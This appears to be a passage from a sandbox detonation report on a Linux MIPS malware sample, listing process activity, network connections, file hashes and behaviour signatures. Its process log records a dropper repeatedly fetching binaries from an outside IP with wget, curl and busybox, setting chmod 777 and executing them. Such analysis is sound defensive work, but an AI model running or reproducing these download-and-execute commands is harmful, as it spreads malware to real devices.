| File opened for modification | /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi | /usr/bin/curl | N/A |
| File opened for modification | /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I | /usr/bin/curl | N/A |
| File opened for modification | /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt | /usr/bin/curl | N/A |
Processes
/tmp/74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh
[/tmp/74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/chmod
[chmod 777 YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I
[./YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/rm
[rm YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/usr/bin/wget
[wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/chmod
[chmod 777 VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS
[./VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/rm
[rm VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/usr/bin/wget
[wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/chmod
[chmod 777 fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd
[./fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/rm
[rm fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/usr/bin/wget
[wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/chmod
[chmod 777 H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS
[./H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/rm
[rm H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/usr/bin/wget
[wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/chmod
[chmod 777 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi
[./4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/rm
[rm 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/usr/bin/wget
[wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/chmod
[chmod 777 RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed
[./RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/rm
[rm RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/usr/bin/wget
[wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/chmod
[chmod 777 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE
[./1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/rm
[rm 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/usr/bin/wget
[wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/chmod
[chmod 777 wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ
[./wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/rm
[rm wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/chmod
[chmod 777 H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak
[./H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/rm
[rm H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/usr/bin/wget
[wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/bin/chmod
[chmod 777 cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ
[./cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/bin/rm
[rm cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/usr/bin/wget
[wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/bin/chmod
[chmod 777 KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F
[./KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/bin/rm
[rm KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/usr/bin/wget
[wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/bin/chmod
[chmod 777 IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L
[./IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/bin/rm
[rm IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/usr/bin/wget
[wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/bin/chmod
[chmod 777 FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG
[./FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/bin/rm
[rm FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/usr/bin/wget
[wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/bin/chmod
[chmod 777 ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt
[./ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/bin/rm
[rm ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/usr/bin/wget
[wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/chmod
[chmod 777 VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS
[./VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/rm
[rm VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/usr/bin/wget
[wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/chmod
[chmod 777 fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd
[./fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/rm
[rm fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/usr/bin/wget
[wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/chmod
[chmod 777 H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS
[./H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/rm
[rm H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/usr/bin/wget
[wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/chmod
[chmod 777 YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I
[./YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/rm
[rm YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/usr/bin/wget
[wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/chmod
[chmod 777 RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed
[./RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/rm
[rm RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/usr/bin/wget
[wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/chmod
[chmod 777 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE
[./1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/rm
[rm 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/usr/bin/wget
[wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/chmod
[chmod 777 wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ
[./wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/rm
[rm wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/chmod
[chmod 777 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi
[./4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/rm
[rm 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/usr/bin/wget
[wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/chmod
[chmod 777 H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak
[./H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/rm
[rm H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/usr/bin/wget
[wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-14 02:38
Reported
2024-11-14 02:41
Platform
debian9-mipsel-20240611-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I | /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I | N/A |
| N/A | /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS | /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS | N/A |
| N/A | /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd | /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd | N/A |
| N/A | /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS | /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS | N/A |
| N/A | /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi | /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi | N/A |
| N/A | /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed | /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed | N/A |
| N/A | /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE | /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE | N/A |
| N/A | /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ | /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ | N/A |
| N/A | /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak | /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak | N/A |
| N/A | /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ | /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ | N/A |
| N/A | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | N/A |
| N/A | /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L | /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L | N/A |
| N/A | /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG | /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG | N/A |
| N/A | /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt | /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt | N/A |
| N/A | /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS | /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS | N/A |
| N/A | /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd | /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd | N/A |
| N/A | /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS | /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS | N/A |
| N/A | /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I | /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I | N/A |
| N/A | /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed | /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed | N/A |
| N/A | /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE | /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE | N/A |
| N/A | /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ | /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ | N/A |
| N/A | /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi | /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi | N/A |
| N/A | /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak | /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak | N/A |
| N/A | /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ | /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ | N/A |
| N/A | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | N/A |
| N/A | /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L | /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L | N/A |
| N/A | /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG | /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG | N/A |
| N/A | /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt | /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
